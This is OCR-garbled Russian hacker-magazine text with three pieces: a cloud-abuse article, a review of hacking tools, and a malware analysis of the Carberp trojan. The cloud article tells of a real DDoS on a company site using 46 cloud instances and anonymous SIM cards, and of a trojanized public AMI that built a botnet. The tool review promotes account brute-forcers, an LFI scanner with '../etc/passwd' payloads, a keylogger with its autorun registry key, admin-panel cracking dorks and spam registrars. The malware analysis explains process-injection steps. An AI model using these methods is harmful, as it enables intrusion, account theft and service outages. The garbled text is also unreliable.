Символы английского алфавита (Іоѵѵ-сазе) и цифры (от 1 до 11 символов) 


27 лет 


$4 631 216 


Символы английского алфавита (Іоѵѵ-сазе) и цифры (от 1 до 10 символов) 


297 суток 


$188 884 



Символы английского алс|эавита (Іоѵѵ-сазе) и цис|эры (от 1 до 9 символов) 



11 суток 



$9 695 



ТАБЛИЦА 2 



Необходимый ресурс 


Стоимость 


Работа одного Іпзіапсе (час) 


$0,085 ~ 3 рубля 


Трафик (іп+оиі) (Гб) 


$0,150 ~ 5 рубля 



ТАБЛИЦА 3 

ми способами пытаются обойти ограничения парольной политики 
и использовать простой пароль. 

В таблице 2 представлены необходимые для генерации различ- 
ных радужных таблиц ресурсы. 

Как видно, генерация «универсальной» радужной таблицы для 
паролей, состоящих из символов английского алфавита (Іоѵѵ- 
сазе) и цифр (от 1 до 12 символов) занимает целый миллениум и 
порядка 80 млн долларов. Для частного лица это на грани фан- 
тастики, но для государств и даже крупного бизнеса — вполне 
подъемно. Если же задаться целью, то используя всего 20 000 
серверов вместо 20, можно создать такую таблицу всего за год. 

Облачный 00о5 

В первую очередь необходимо разобраться со схемой проведе- 
ния эффективной ДДоС-атаки на сервер/сервис. Гаранты эффек- 
тивности ДДоС-атаки: 

• большое количество атакующих машин; 

• «умная» нагрузка атакуемой системы. 

ІааЗ в скопе со специализированным ВВо5-софтом — этой убой- 
ная конструкция, позволяющая осуществлять очень эффективные 
ДДоС-атаки. Сервис ІааЗ удовлетворяет пункт о необходимом 
множестве атакующих машин. Специализированный софт должен 
отвечать за «умную» нагрузку атакуемых систем с целью «отказа 
в обслуживании». 

Специалистами нашей компании было разработано техническое 
задание для подобного рода софта. Требования к распределен- 
ной системе нагрузочного тестирования: 

• мультиплатформенность (Ыпих/ѴѴіпсІоѵѵз); 

• модульность; 

• централизованное управление (клиент<->сервер). 

Необходимые на первых парах модули: 

• 5УМ Пооб 

• иОРПооб 



• ІСМРПооб 

• Арріісабоп [[ооб 

• НТТР/НТТР5 (0ЕТ/Р05Т) 

• РТР 

• 5МТР/5МТР+55Е/ТЕ5 

• РОРЗ/РОРЗ+55Е 

Параллельно с разработкой распределенной системы нагрузоч- 
ного тестирования, мы провели испытания уже существующего 
софта для нагрузочного тестирования. Большая часть публичного 
ПО не удовлетворяла пункту централизованного управления, 
в связи с чем пришлось самостоятельно писать управляющие 
скрипты для централизации управления атакующими приложе- 
ниями. 

Из публичных утилит мы использовали два продукта: 

• Маизгабп ( ѵѵѵѵѵѵ.регібеі.аі/зес/ппг/ ) — утилита для генерации 
трафика (как валидного, так и невалидного). В большинстве слу- 
чаев используется для проведения тестирования сетей ѴоІР или 
больших сетей, а также для проведения аудита безопасности в 
отношении систем, возможно уязвимых для специфических атак 
на отказ в обслуживании. 

• ЗІоѵѵРозГрІ (аналог для ЗІоѵѵЕогіз НТТР Во5 Тооі) — небольшой 
скрипт, позволяющий провести атаку на протокол НТТР через 
РОБТ-запросы к веб-серверу, с целью вызвать отказ в обслу- 
живании (исчерпав максимальное количество подключений к 
серверу). Более подробное описание данной атаки представлено 
на странице БІоѵѵЕогіз НТТР ВоБ ( Ьа.скегз.огд/Ыод/2009061 7/ 
зіоѵѵіогіз-бир-сіоз/ ). Аналогичный способ Арріісабоп ЕІоосІ 

для протокола НТТР через РОБТ-запросы с использованием 
облачных вычислений был представлен Дэвидом Брайеном и 
Михаилом Андерсоном на хакерской конференции □еі'соп 18 ( ЫТ 
[у/ІісІ5Бг ). Они реализовали функционал распределенной системы 
Арріісабоп ЕІоосІ’а для протокола НТТР, но, к сожалению, прак- 
тический результат в виде «отказа в обслуживании» реального 
сервера (парнями был использован для презентации один из 
веб-серверов Оеі'соп’а) не был получен, хотя задумка в теории 
действительно должна была отлично работать. К такой заминке 
могло привести либо недостаточно эффективное осуществление 
Арріісабоп ЕІООСІ, либо недостаточное количество атакующих 
серверов. В разработке скрипта БІоѵѵРозТрІ основной качествен- 
ной характеристикой являлось эффективное осуществление 
Арріісабоп ЕІООСІ. В итоге, скрипт позволяет создать и поддер- 



ТАБЛИЦА4 



Необходимый ресурс 


Качество 


Стоимость 


Работа одного Іпзіапсе 


1 


$0,085 ~ 3 рубля/час 


Трафик (іп+оиі) (Гб) 


<1 


<$0,150 ~ <4 рублей 




Итого: 


<7 рублей/час 
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Генерация РаіпЬоѵѵ ІаЫез 



живать одновременно более 900 подключений к атакуемому 
веб-серверу с одной атакующий машины. Такие характеристики 
позволяют с помощью всего одной атакующей машины обе- 
спечить атаку на «отказ в обслуживании» для большинства веб- 
серверов, работающих под управлением веб-сервера АрасЬе. 
Ведь директива МахСІіепІз по умолчанию равна 256: веб-сервер 
обеспечивает возможность работы только с 256 пользователям 
одновременно. Веб-сервер 115 (ѴѴіпсІоѵѵз 2003 Зегѵег), в отличие 
от АрасЬе, использует значение по умолчанию, равное приблизи- 
тельно 20 000. 

Разработка системы распределенного нагрузочного тестирова- 
ния была проведена в соответствии с возможностями сервиса 
1аа5 от провайдера Атагоп ( аѵуз.атагоп.сопп ). Выбор пал на 
данного провайдера не случайно. Во-первых, Атагоп — доста- 
точно быстро развивающийся крупный проект, позволяющий 
своим пользователям одними из первых получать доступ к новым 
«фичам» функционала облачных вычислений. Во-вторых, после 
проведения сравнения бюджета на реализацию атак на отказ в 
обслуживании, который приведен ниже в таблице 3, оказалось, 
что сервис от Атагоп наиболее демократичен и гибок. 
Технические характеристики запускаемого Іпзіапсе, выступающе- 
го в роли атакующего звена, представляют собой следующее: 

• система х86/х64 (1 СРВ); 

• 613 Мб ОЗУ; 

• 10 Гб НОВ. 

Технические характеристики Іпзіапсе были выбраны минималь- 
ными в силу того, что для реализации атаки на «отказ в обслужи- 
вании» приоритет отдается количеству атакующих машин, а не 
их вычислительным характеристикам. Каждый Іпзіапсе снабжен 
каналом с пропускной способностью 100 МЬ/з, поэтому проблем 
в скорости передачи данных до атакуемого сервера теоретически 
быть не должно. 

В первую очередь было очень интересно увидеть реальную мощ- 
ность предполагаемого «ботнета» на облачных технологиях. Для 
теста был выбран сценарий упомянутого Брайена Андерсона, 

НТТР Оо5 веб-сайта с помощью одного инстанта 



’ С X Ьвр:// 

Р С«мы« пбпу/мрмы* V (к1ЪП9 $ип «<1 НыЛіпм 

9 АѴѴ$ Мап«9«пвп( СошоІ* X | Злгруііи... X [ 



[ ^ ц(мп(и«ір<10>П7-4М71: - 








иЬипеиѲір-10-117-43-171:-$ 


./Ьсср^о 


3 


400 



представляющий из себя реализацию атаки на «отказ в обслужи- 
вании» для НТТР-сервера. 

Как было выяснено, связка 1 «Іпзіапсе» + скрипт ЗІоѵѵРозГрІ 
позволяет эмулировать более чем 900 клиентов веб-сервера. 
Таким образом, этой связки достаточно, чтобы вывести из строя 
любой веб-сервер, поддерживающий максимальное число под- 
ключений менее чем 900. Бюджет, необходимый для реализации 
такой атаки сводится к минимуму за счет потребления лишь 
компьютерного времени, а не ресурсов и трафика. Себестоимость 
атаки для таких веб-серверов — меньше 7 рублей в час! (см. 
таблицу 4) 

При тестировании в реальных условиях мишенью выступал веб- 
сайт, обслуживаемый сервером 115. Балансировка нагрузки была 
разделена на два ІР-адреса. Таким образом, чтобы положить этот 
сервер, потребовалось создать более чем 20 000 подключений 
к каждому из ІР-адресов. Настройки атакуемого веб-сервера 
были установлены по умолчанию. В итоге, для обеспечения 
всех условий для удачной атаки «отказ в обслуживании» было 
запущено 46 «Іпзіапсе», каждый из которых эмулировал одно- 
временную работу 900 пользователей. Кстати, обычным пользо- 
вателям Аппагоп позволяется работать одновременно только с 20 
«Іпзіапсе». Чтобы полностью пройти путь плохого парня, заду- 
мавшего ВВо5-атаку, мы просто зарегистрировали три различ- 
ных аккаунта. Кроме этого, для регистрации нам понадобилось 
три сим-карты. Естественно, были куплены анонимные карты с 
балансами 300 рублей — причем абсолютно легально. К каждой 
сим-карте была приобретена карта оплаты (РгераісІ Сагб Рог 
Іпіегпеі; 5Ьорріпд) с балансами $5 — карта необходима при реги- 
страции на площадке Атагоп и верификации. В итоге, бюджет 

Троянизация АЛЛІ 

КіщиеЛ ІпЛапЕЯБ Ѵ^ігапІ сині і 
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Статистика использования паролей 
в российских компаниях 





и Т<м 1 «йо ци4рм (пишепс) 



■ СиммлмапглмАсмга ■лфмига ■ пкжмсм 
рсгжтре (Іо«мгіІрЬ«) 

и СмммлкііиглмАсіюго мфмита ■ ииркнвм 
смгистрс и цифры ()оімгр|рІі»^иіті»гіс) 

■ СшимлылиглмАсмго алфавита а раэнаш 
рсгмстрав и цифры (тіхаірЬа^итегіс) 

Ы Симаолаі аиглмйсиото алфавита а раіныа 
рсгистрая (тиаІрКа) 

■ Сиаімлаі аиглийсиого алфавита а аарлнам 
регистра и цифры (аірНаимипагіс) 

ы Симаолм руссиого алфавита а нижнем 
регистре (ІоижгаІрКа-сиі) 

к Прочие наборы 



Необходимый ресурс 


Качество 


Продолжительность 

атаки 


Стоимость 


Сим-карта 


3 


— 


900 рублей 


Работа одного Іпзіапсе 


46 


2 


$0,085 * 46 * 2 = ~ 240 рублей 


Трафик (іп+оиі) (Гб) 


<2 


— 


<$0,150 ~ <8 рублей 


Таблица 5 


Итого: 




1150 рублей 



ДЛЯ атаки «отказ в обслуживании» на веб-сайт достаточно круп- 
ной компании составил всего 1 150 рублей. Детальная стоимость 
представлена в таблице 5. 

Атака проводилась в отношении веб-сервера на протяжении 
двух часов, чего вполне достаточно для оідутимых потерь в 
сфере интернет-бизнеса. 

Трояны в Іпзіапсе 

Удобство облачных сервисов заключается также в гибкости 
выбора ОС и ее компонентов через приятный веб-интерфейс. 
Пользователь может использовать как стандартные решения, 
предоставленные провайдером, так и образы ОС, созданные 
пользователями провайдера. Например, сервис от Амазон 
очень активно использует данную систему. Именно в ней и кро- 
ится опасность — провайдер не гарантирует того, что образы 
систем, предоставленные пользователями для обідего исполь- 
зования, не выполняют никаких скрытых действий: например, 
не ведут логи, не копируют личную информацию, не становятся 
частью ботнета, не распространяют вредоносное ПО. 
Проведенные тесты показали, что многие пользователи дей- 
ствительно не следят за такими веідами. Для проведения теста 
потребовалось: 

• создать образ популярной ОС в формате АМІ и выложить его в 
открытый доступ в интерфейс Амазона; 

• составить хорошее описание настроенной системы (установ- 
ленный софт, полезные «плюшки» и т.д.); 

Кроме этого мелким шрифтом в описании программы было 
написано, что при старте этого образа ОС в автоматическом 
режиме происходит НТТР-ОЕТ-отстук на сервер, собираюідий 
статистику. Хотя об этом можно было и не говорить в описании 
образа, мелкий текст не испортил картины. Как результат — 
более 1000 отстуков за месяц! Представь, какой хороший и бес- 
платный ботнет можно собрать. Размеідаешь протрояненный 
образ с красивым описанием — пользователи устанавливают 
его, а ты анонимно пользуешься их серверами за их же деньги. 

АЬи$е-практика 

Теоретически, оперативное реагирование на жалобы должно 
быть правилом для любого провайдера. В реальности же все 



обстоит несколько иначе. Проведя небольшое исследование, 
было выявлено, что даже серьезные провайдеры облачных сер- 
висов (например, Атагоп), не спешат реагировать на аЬизе и 
расследовать инциденты. Фактически, дело не заходит дальше 
учета сообідений об инцидентах. Во-первых, чтобы инцидент 
был рассмотрен провайдером, необходимо предоставить, поми- 
мо ІР-адреса атакуюідего, точную дату и время атаки. После 
предоставления необходимой информации о злоумышленнике, 
переписка с провайдером будет продолжаться. Но это будет 
односторонняя переписка: провайдер с радостью выслушает 
ответы на интересуюідие его вопросы, но вот на твои — не отве- 
тит, за редким исключением, любезно игнорируя. 

Что делать в случаях атак 

При первом обраідении к провайдеру, служба безопасности 
просит предоставить следуюідую информацию: 

• ІР-адрес атакуюідего; 

• ІР-адрес жертвы; 

• атакуемый порт и протокол, по которому происходила атака; 

• точную дату, время и временную зону жертвы; 

• логи с машины жертвы, подтверждаюідие факт атаки (не более 
4 Кб); 

• контактные данные. 

Крайне важны точное время атаки и временная зона атакуемой 
машины. Это связано с тем, что ІР-адрес атакуюідего может 
менять владельца более одного раза за сутки, что усложняет 
идентификацию злоумышленника. Кроме этого следует точно 
идентифицировать вид атаки и создать слепок лог-файлов 
атакуемого сервиса для предоставления службе безопасности 
провайдера. 

Заключение 

Облачные технологии, предоставив пользователям доступ к 
огромным вычислительным возможностям, также дали возмож- 
ность плохим парням использовать свои моідности в корыстных 
целях. Панацеи от этого не суідествует. Но, зная возможные 
векторы атаки с использованием облачных вычислений, можно 
заідитить свои информационные ресурсы от возможных инци- 
дентов. 
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Программа: ѴѴіІсЫооІ 
ОС: *піх/ѵѵіп 
Автор: 1ЬЗ_\л/11сЬ 
















Все включено! 



Первым В нашем обзоре выступает приме- 
чательный хакерский комбайн, написанный 
мембером турецкой команды Маказзаг ЕіЫсаІ 
Наскегна перле. Прога работаете интерактив- 
ном режиме и совмещает в себе функционал 
множества полезнейшихутилит, начиная со 
сканера портов и заканчивая сканером ІРІ- 
дорков. Разобраться с использованием сканера 
довольно просто, однако опишу для примера 
сценарий работы при поиске ЕРІ (Росаі Рііе 
Іпсіибе). Пример использования сканера: 

Таг^еТ : Іі1;1;р://5І1;е.сот/іпсІех. 
рІір?ра§е= 

# Примерные запросы для поиска 
содержащиеся в сканере: 

. ./еТс/раззысІ 
. ./еТс/раззысІ 

./еТс/раззысІ 
. ./. ./. ./. ./еТс/раззысІ 
и т.д. 

Абсолютно аналогично в интерактивном режиме 
можно брутфорсить М05, находитьдорки 50Р- 
инъекций, грабитьсвежие прокси с сервиса 
ргохуІізРпеІ: и т.д. 

Перед началом работы со скриптом тебе могут 
понадобиться дополнительные перловые моду- 
ли, найти ихты также сможешь на нашем диске. 
Примерустановки модуля 0а1:а::Ѵа[іба1:е::ІР: 

ссі тосіиіез 
ссI-Nе1;-КаыIР 00:25 
регі Макебіе. РІ 
таке & & таке іп5І;а11 



Программа: МРВгиІе 
ОС: \Л/іпсІ0\л/5 2000/ХР/2003 Зегѵег/ 
Ѵі$Іа/2008 5егѵег/7 
Автор: [і]Рго, Оагк-ѵѵеЬ.ѵѵ$ 




Брутим аккаунты МаіІ.Ри 

На очереди еще один брутфорс для работы со 
всем известным сервисом МаіІ.Ри. Функционал 
и особенности брутфорса достаточно стандартны 
для та КО ГО рода софта: 

• многопоточность (максимум 150 
потоков); 

• поддержка прокси (НТТР/50СК54/5); 

• встроенный генератор сорца; 

• удобная статистика в системном трее 
(один клик по иконке в трее - вывод 
краткой статьц двойной клик - вывод 

формы брута); 

• таймауты; 

• для работы требуется .МЕТ Ргатеыогк. 

Для начала работы с прогой тебе необходимо 
зайти в настройки и изменить следующие 
параметры: 

• ВасІ -файл с неподобранными аккаунтами; 

• СоосІ - файл с СоосІ (подобранными) 
аккаунтами; 

• Боигсе - список аккаунтов для брута^ 
должен иметь вид етаі1@таі1. ги: 
раззыогсі; 

• Ргоху - список прокси для работы 
программы; 

• ТІігеасІБ - число потоков; 

ТітеОиІ; - время подключения к серверу 



(по истечении этого времени прокси 
меняется); 

• Оеіітіііег - разделитель спика Зоигсе: 
<Іо§іп>:<Ра55ыогсІ>; 

• Туре Ргоху - тип используемых проксиков. 

Далее тебе может понадобиться генератор 
сорцев. В работе с ним также нет ничего 
СЛОЖНОГО: в левый лист занос им СВОЙ СПИСОК 
мыл, в правый — СПИСОК паролей. Далее 
жмем на кнопку «бепегаіе» и наблюдаем 
ГОТОВЫЙ СПИСОК Зоигсе.ІхР 
Также автор брутфорса упоминает и об одном 
баге своего творения: при использовании 
НТТР Ргоху с каждым аккаунтом в логе со- 
бытий будет ВЫВОДИТЬСЯ производственная 
ошибка — внейнет ничего страшного. 

Программа: МОгаЬ 

ОС: \Л/іпсІ0\л/5 2000/ХР/2003 Зегѵег/ 

ѴІ5Іа/2008 5егѵег/7 

Автор: Вооіеап 




А ВОТ И еще одна прога для работы с МаіІ.Ри. 

На сей раз это граббер мейл-адресов, который 
пригодится тебе в сочетании с описанным выше 
МРВгиІе’ом. Сам процесс сбора мыльников 
проходите ПОМОЩЬЮ бага в сервисе оІѵеРтаіІ. 
ГУ, который показывает все адреса пользовате- 
лей в открытом виде. Особенности граббера: 

• работа в одном потоке; 

• проверка на дубликаты; 
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• иконка и возможность свернуть в трей; 

• возможность выставления таймаута; 

• подробный лог работы; 

• возможность выбора разделов для 
граббинга в окне «Рог СгаЬ» (например: 
■РгіепсІБ^ аи1;о^ ЬиБІпезз^ соип1;гіе5^ 
та§іс^ геіах^ -РоосІ и т.д.)* 

После окончания работы граббера утебя будет 
огромный списокмыльников, которыеты впол- 
не сможешь использовать в своих корыстных 
целях. 

Программа: РеаІІоддег 
ОС: \Л/іпсІ0\л/5 2000/ХР/2003 Зегѵег/ 
Ѵі$Іа/2008 5егѵег/7 
Автор: Ѵап32 





- 


Спи«і{шйб>тыі; РТі’ 


0™»1« *т-'5ііг[гхѵ>і 


йхт: Ьой.сап 


П*: ВнЛІоддя.*™ 


ПсГ№Г 


■^лоч: 




Спиіиііяіпвгткм 


Пігкд; 




Тест ' 


■ ОГСЬІГѴПЪ ло™ ы РІР 




ОгЕьгить ЛОЛ* ш г*йі 


0пітра5<угы4 гентси 
К«т: 1эдй.Св« 


Нѵтцшт. 5 ; 


ГѴіі,к-е.Тіу; 

СчлпР гейта 


УГииімгть ЦРѴіи 

л 


(.шдаіъі 


ІЬохч 



Правильный кейлоггер 



Встречаем — кейлоггер ВеаНоддеготучаст- 
ника форума 1"искаѵ.ги Ѵап32. Какпонятно из 
названия, данная программа предназначена 
для скрытого наблюдения за компьютером и 
мониторинга активности пользователя. Софти- 
на реализует всю стандартную для кейлоггеров 
функциональность: прописывается в автоза- 
грузке, записывает нажатия клавиш влюбой 
раскладке и складывает отчеты с заданной ре- 
гулярностью на РТР-сервер либо на специаль- 
ный рЬр-гейтв виде Р05Т-запросов. В реестре 
логгер прописывается следующим образом: 

Н КСи \ 5 о-Рі;ыа г е \Мі с Г05 0 -Р 1 : \1ліі псі ОЫ5 \ 
Сиггеп1;Ѵег5Іоп\Кип :Ап1;Ѵіг 
с : \с1оситеп1;5 апсі 5е1:1:іп§5\асІтіп\1оса1 
5е1:1:іп§5\арр1іса1;іоп сіа1;а\ап1;ѵіг.ехе 

Автор программы будет рад ответить на любые 
вопросы в топике на форуме РискАѴ: Ьіі.іѵ/ 
ЩзС. 

Программа:Т05 КіІІег 
ОС: *піх/ѵѵіп 
Автор: сіапіеі_1024 




Брутим Т05 



ТВ5 Кіиег — ЭТО перловый скрипт, предна- 
значенный специально для массового брута 
админок популярных скриптов распределения 
трафика (ТВ5). В данный момент поддержива- 
ются дветдски: 5ітр[еТВ5 и АбѵапсебТВЗ. 
Конфиг программы выглядит следующим об- 
разом: 

ту $1;Ііг = 20; # кол-во потоков 

ту $1;сІ5_1:уре = 0; 

• 0 - Зітріе Т05; 1 - АсІѵапсесІ Т05 

В файле 1:6 5. 1x1: должны содержаться адреса 
админокТВЗ, а в файлах Іодіп.іхі: и разз.іхі: — 
соответственно логины и пароли для брутфор- 
са. Во время брута на экран выводится скорость 
и текущий статус процесса. 

Скриптобладает многопоточностью, по отзывам 
пользователей скорость может доходить до де- 
сяти запросов в секунду. Автор также приводит 
и дорки для поиска тдсок в гугле: 

• Зітріе ТОЗ - «іпигі :§о. рІір?5І6=» 

• Абѵапсеб ТОЗ - «ои1; . рІір?5_і6=» 

Проверить на валидность напарсенные из по- 
исковиков ссылки можно с помощью специаль- 
ного скрипта 1б5_сЬескег.р[, который ты также 
сможешь найти на нашем диске. Любые пред- 
ложения и пожелания ты можешь оставлять в 
топике на Ачате Ыі.Іѵ/тѵѵІДЬО . 

Программа: РатЫег Реддег 
ОС: \Л/іпсіоѵѵ5 2000/ХР/2003 Зегѵег/ 
ѴІ5іа/20083егѵег/7 
Автор: 2сІе2 ВіІ Уа 




Массовая регистрация ящиков на 
РатЫег'е 

Теперь приступим ксвежемусофту от посто- 
янного участника нашей рубрики Ібет. ВіІУа. 
Первая из представленных софтин — это про- 
грамма для массовой регистрации етаіГов на 
сервисе ВатЫегги . Программа имеетмногопо- 
точный режим (втом числе через зоскз), кроме 
этого она распознает капчу с помощью сервиса 
Апіідаіе. Логины и пароли для мыл генерируют- 
ся автоматически, а результат работы програм- 



ма записывает в файл дооб.іхі, ведя при этом 
подробный лог. Официальная страница реггера 
— Ьі1:.[ѵ/ііѵ253 . Тамже можно задать любые свои 
вопросы автору. 

Программа: ІСОЛЛиІІігеддег 
ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 Зегѵег/ 
ѴізІа/2008 Зегѵег/7 
Автор: 2сІе2 ВіІ Уа 




Много асек не бывает 

Вторая прога отібет. ВіІУа — это массреггеруи- 
нов через сервис ісд.сот . который был написан 
совсем недавно и, в отличие от другого подоб- 
ного софта, еще долго не утратит свою актуаль- 
ность. Особенность реггера состоит в том, что 
процесс регистрации асечных номерков проис- 
ходите помощью списка етак-адресов (здесь 
тебе и может пригодиться ВатЫегВеддег).Так 
какв прошлом годуася полностью изменила 
свои системы ретрива и регистрации, теперь 
зарегатьаськуты сможешьтолько с валидным 
мейлом, с помощью которого регистрация и под- 
твердится. Другие особенности утилиты: 

• многопоточность; 

• распознавание капчи через антигейт; 

• прокси и соксы; 

• подробные логи работы программы; 

• формат файла с мылами: етаіі; пароль 
(по одному в строке); 

• сохранение всех зарегистрированных 
асек в файл §оо6 . 1:х1; ; 

• подтвержденная работа с мейлами сле- 
дующих сервисов: таіі.ги (Ьк.ги^ іпЬох. 
ги^ 1І5І:.ги)^ уапбех.ги^ гатЫег.ги; 

• теоретическая работа со всеми мыльными 
сервисами^ РОР-сервер которых выглядит 
как рор.БІіе.ботаіп. 

На выходеты получишьсписоквалидныхеве- 
жезареганныхасек, которые идеально подойдут 
для рекламной рассылки :). За поддержкой об- 
ращайся прямиком к автору: Ыиѵ/кВѵОгІ . пг 
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Бутенко Александр, Маіѵѵаге Апаіузі бгоир-ІВ (іРе9епШдтаі1.сот) 
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\Л/іп32/Тго|апРо\л/пІоасІег.СагЬегр 



Изучаем все секреты трояна 
ѴѴіп3^го]ап0оѵѵпІоа(Іег.СагЬегр 

ѳТроян №іп32/СагЬегр появился не так давно, в первой половине 2010 
года, и можно сказать, что этот вирус имеет неплохой потенциал. Он 
использует достаточно большое количество необычных трюков для 
обхода эвристических алгоритмов современных антивирусов и 
сканеров. «Полезная» нагрузка же делает его сравнимым с 2си$'ом 
или ЗруЕуе. В этой статье мы рассмотрим некоторые особенности 
данного троянца. 



с чего же все началось? 

Когда мы принялись исследовать этого зловреда, из пяти сем- 
плов, посланных на ѴігизТоІаІ.сопп . только один определялся 
многими антивирусами, у остальных четырех семплов количество 
детектов было гораздо меньшим. Сравнив все экземпляры при 



помоіди плагина ВіпОіІ'1' для ІОА, мы обнаружили, что код был 
идентичным. Посмотрев внимательнее на файлы в редакторе 
НІЕѴѴ, картина стала проясняться. Во-первых, отличались неко- 
торые поля РЕ-заголовка. Во-вторых, в первой секции «.Іехі» 
не было кода вообіде, а единственное, что там было прописано. 
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Ѵ\/іп32/Тго|апРо\л/пІоасІег.СагЬегр 



А ВОТ антируткит ОАЛЕР все-таки заметил что-то неладное 



— имена двух библиотек (кегпе132.сіи и асІѵарі32.сіи), а также 
название одной функции (ЕциаІРгебхЗіб), которые окружены 
случайными последовательностями байтов. Эти данные исполь- 
зуются при распаковке вируса. Ну и наконец, отличались табли- 
цы релокаций. Предпоследние секции «.геіос» были различного 
размера, и сами значения релоков также не совпадали. Именно 
эти три отличая позволяли данному вирусу обходить сигнатуры. 
Также, помимо пяти семплов одной версии зловреда, были 
исследованы еще две версии, которые отличались друг от 
друга как механизмами защиты, так и своим функционалом (см. 
таблицу 1). 

Наконец мы приступили непосредственно к исследованию. При 
анализе вирусов часто приходится сталкиваться со сложностями 
при снятии навесной защиты из-за различных антиотладочных 
приемов и обфускации. Но с данным экземпляром проблем не 
возникло, его упаковщик снялся без особых усилий. Впрочем, 
самое интересное начинается дальше. 

Временные файлы 

При анализе этого зловреда мы сначала не поняли, зачем же он 
создает временные файлы, копируя в них стандартные библио- 
теки ѴѴіпсІоѵѵз (пісіи.сіи, кегпе132.сіи и \л/52_32.сіи). Оказалось, что 
это делается для безопасности вируса. После создания копии 
библиотеки, он отображает ее к себе в память, находит нужные 
ему при работе функции и сравнивает первые 10 байт с теми, что 
находятся в импортированной библиотеке. Если они не совпада- 
ют, значит какая-то «недобрая» программа поставила хук на эту 
функцию, и вирус сразу восстанавливает эти 10 байт из ориги- 
нальной библиотеки, а точнее — из образа ее копии. Поэтому с 
уверенностью можно сказать, что желающие поизучать внутрен- 
ности СагЬегр’а мог\ут отложить АРІ Мопііог на дальнюю полку 
своего жесткого диска :). 

Вызовы АРІ-функций также сделаны с изюминкой. В программе 
присутствует механизм, который получает на вход константу, а 
на выходе высчитывает необходимый адрес. Конечно, этот под- 




Забавно, что через ТазкМападег можно увидеть нашего 
«невидимку» 



ход значительно затрудняет статический анализ зловреда, хотя 
также имеет и свои минусы — если поставить точку останова на 
конец функции расшифрования, то легко можно отследить после- 
довательность вызова функций, а написав парочку скриптов для 
ОНуВЬд и ІВА, можно восстановить их названия и без проблем 
статически исследовать код. В одной из исследуемых версий 
трояна также использовалось шифрование всех текстовых строк, 
используемых программой, что значительно затруднило анализ 
вредоносных возможностей. 

Завоевание новых территорий 

Во многих троянах код «полезной нагрузки» не выполняется при 
первом запуске — он инжектируется в какой-то уже работающий 
процесс и начинает действовать уже там. Данный вредонос — не 
исключение, и для внедрения он использует процесс ехріогег.ехе. 
Только делает он это очень необычно. 



Классификация компании Е5ЕТ 


Хеш файла 


\Л/іп32/ТгоіапОоѵѵпІоасІег.СагЬегр.\/\/ 


641С4РР3047077231А9293Ю75С20017 


\Л/іп32/ТгоіапОоѵѵпІоасІег.СагЬегр.Х 


□9О92134Р12469А68РСА24Р49Р1СС608 


а ѵагіапі о! \Л/іп32/КгурІік.ІКІ (эвристический детект) 


74995А8Р06Е1268А43Е1СР26А36ОРР84 



Таблица 1. Отличие версий по с(эункционалу и защитным механизмам 
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\Л/іп32/ТгоіапРоѵѵпІоасІег.СагЬегр 



\Л/іп32/Тго| 





\Л/іп32Ягоіап- 

Ооѵѵпіоасіег. 

СагЬегр.ѴѴ 

1го|ап 


Ѵ\/іп32/Тгоіап- 
Оо\л/п1оас1ег. 
СагЬегр.Х 1го|ап 


\Л/1п32Яго|апОо\л/п- 

ІоасІег.СагЬегр.Х 

Ігоіап 


Пакер 


Да 


Да 


Да 


Анти-В/Ѵ\ 


Нет 


Нет 


Нет 


Анти-отладка 


Нет 


Нет 


Нет 


Метод инъекции 


Создание двух 
объектов типа «5ес- 
Ііоп» 


Создание двух 
объектов типа "Зесііоп" 


Вызов ОиеиеАРСТІігеасІО 


Шифрование строк 


Нет 


Да 


Нет 


Шифрование команд 


Нет 


Да 


Нет 


Шифрование функций 


Да 


Да 


Да 


Предотвращение перехвата АРІ- 
функций 


Да 


Да 


Да 


Рандомизация данных в секциях 


Да 


Да 


Да 


Сокрытие вредоносного файла от ОС 


Да 


Да 


Да 



Таблица 2. Все средства защиты, применяемые нашим трояном 



Первым делом, процесс вызывает функцию СгеаІеРгосезз с 
выставленным флагом СРЕАТЕ_5и5РЕМ0Е0, тем самым соз- 
давая новый, приостановленный дочерний процесс ехріогег. 
ехе. Затем вызовом функции ^ѵѵСгеаІеЗесІіоп создается объ- 
ект «секция» (5ес1;іопОЬ]ес1; — это часть памяти, которая может 
разделяться между разными процессами) со всеми возмож- 
ными правами (чтение, запись, исполнение). Далее секция 
манится в контекст трояна функцией ^ѵѵМарѴіеѵѵОІ'ЗесІіоп и 
при помощи тетсру вредонос копирует свою распакованную 
копию в эту область памяти. После этого, секция отображается 
в контекст дочернего ехріогег.ехе, и тем самым туда заносится 
вредоносный код. Но это еще не конец, ведь вредоносный код 
должен также выполниться ехріогег’ом. Для этого функцией 
РеасІРгосезэМетогу из процесса ехріогег.ехе копируется место, 
где находится спроецированный исходный файл, в контекст 
вредоносной программы. Создается еще одна секция, которая 
сначала отображается в троянскую программу, а потом в нее с 
помощью тетсру копируется полученная из ехріогег’а часть 
памяти. Следующим шагом патчатся несколько байт на точке 
входа таким образом, чтобы происходил прыжок на вредоносную 
функцию. И наконец, секция отображается в контекст ехріогег’а 
на то место, где раньше находился исходный образ. Теперь 
все готово для запуска дочернего ехріогег’а. Троян вызывает 
^ѵѵРезитеТЬгеасІ, тем самым запуская вредоносный код, уже 
находящийся в другом процессе. Получив управление в новом 
месте, СагЬегр начинает работать в полную силу, запуская вре- 
доносные функции рауіоаб’а и внедряясь во все запускаемые 
процессы. Естественно, во всех новых захваченных территориях 
вредонос также производит описанную выше проверку на нали- 
чие хуков в необходимых ему АРІ-функциях. 

В более новой версии СагЬегр’а нами был обнаружен другой спо- 
соб заражения порожденного процесса ехріогег.ехе. Первые шаги 



остались неизменными — сначала создается глобальная секция, 
которая манится в дочерний процесс, и туда копируется вредо- 
носный код. А дальше вызывается недокументированная функция 
2\л/0иеиеАрсТЬгеас1, которая ставит в очередь на выполнение в 
ехріогег’е асинхронный вызов одной из вредоносных функций, 
находящихся в образе секции. При вызове ^ѵѵРезитеТЬгеасІ 
начинается выполнение вредоносного кода. 

Игра в прятки 

Прежде чем обсуждать функции, которыми может похвастаться 
данный вредонос, стоит разобрать еще несколько интерес- 
ных моментов его жизни. Конечно же, как и любой уважающий 
себя вирус, СагЬегр прописывается в автозагрузку, причем 
банально копируя себя под случайным именем в директорию 
%Н0МЕПРІѴЕ%\%Н0МЕРАТН%\5іагіМепи\Ргодгат5\5іагШр\. Тем 
не менее, не все так просто! В вирусе предусмотрен механизм, 
позволяющий скрыть присутствие файла в системе. 

После внедрения трояна в дочерний ехріогег.ехе, вызывают- 
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Так выглядит подмена функций 



ся механизмы, которые инжектируют его в исходный ехріогег. 
